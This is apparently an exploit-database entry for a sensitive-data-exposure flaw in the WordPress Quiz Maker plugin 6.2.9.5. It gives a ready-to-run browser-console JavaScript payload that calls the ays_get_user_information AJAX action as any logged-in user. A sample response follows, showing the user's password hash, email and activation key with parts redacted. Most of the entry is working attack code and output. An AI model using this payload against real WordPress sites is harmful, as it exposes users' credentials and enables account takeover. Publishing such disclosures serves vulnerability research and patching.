# Exploit Title: Quiz Maker 6.2 - Sensitive Data Exposure (User Credentials)
# Exploit Author: Gh05t666nero
# Team: INDOGHOSTSEC
# Date: 24/01/2022
# Vendor : Quiz Maker team
# Product: https://wordpress.org/plugins/quiz-maker
# Version: 6.2.9.5
# Summary: Quiz Maker plugin allows you to create powerful and engaging quizzes, tests, and exams within minutes. This WordPress plugin offers dozens of options to build fully customizable and advanced level exams. You can build an unlimited number of quizzes and questions. No limit on the count of participants taking the test at the same time.
# Descripion: The plugin was able to access user credentials such as passwords via a request made by an authenticated user (Not necessarily Administrator)
# Tested on: Wordpress 5.8+
# Vulnerability discovered by Gh05t666nero (Ojan) | Cyber Security Foundation Professional Certificate (CSFPC)
# Make sure you are logged in and run the Payload below using console menu in Devtools:-
var xhr = new XMLHttpRequest();
xhr.open('POST', '/wp-admin/admin-ajax.php', true);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.onload = function () {
console.log(this.responseText);
};
xhr.send("action=ays_get_user_information");
# Response (sensored):
{
"data": {
"ID": "30",
"user_login": "ojan",
"user_pass": "$P$Bm8d[REDACTED]WhKu0",
"user_nicename": "ojan",
"user_email": "ojan[REDACTED].com",
"user_url": "",
"user_registered": "202[REDACTED]7:09",
"user_activation_key": "1642[REDACTED]06:$P$Bo[REDACTED]cD1O/",
"user_status": "0",
"display_name": "M[REDACTED]a"
},
"ID": 30,
"caps": {
"um_eb": true
},
"cap_key": "wp_capabilities",
"roles": [
"um_eb"
],
"allcaps": {
"read": true,
"um_eb": true
},
"filter": null
}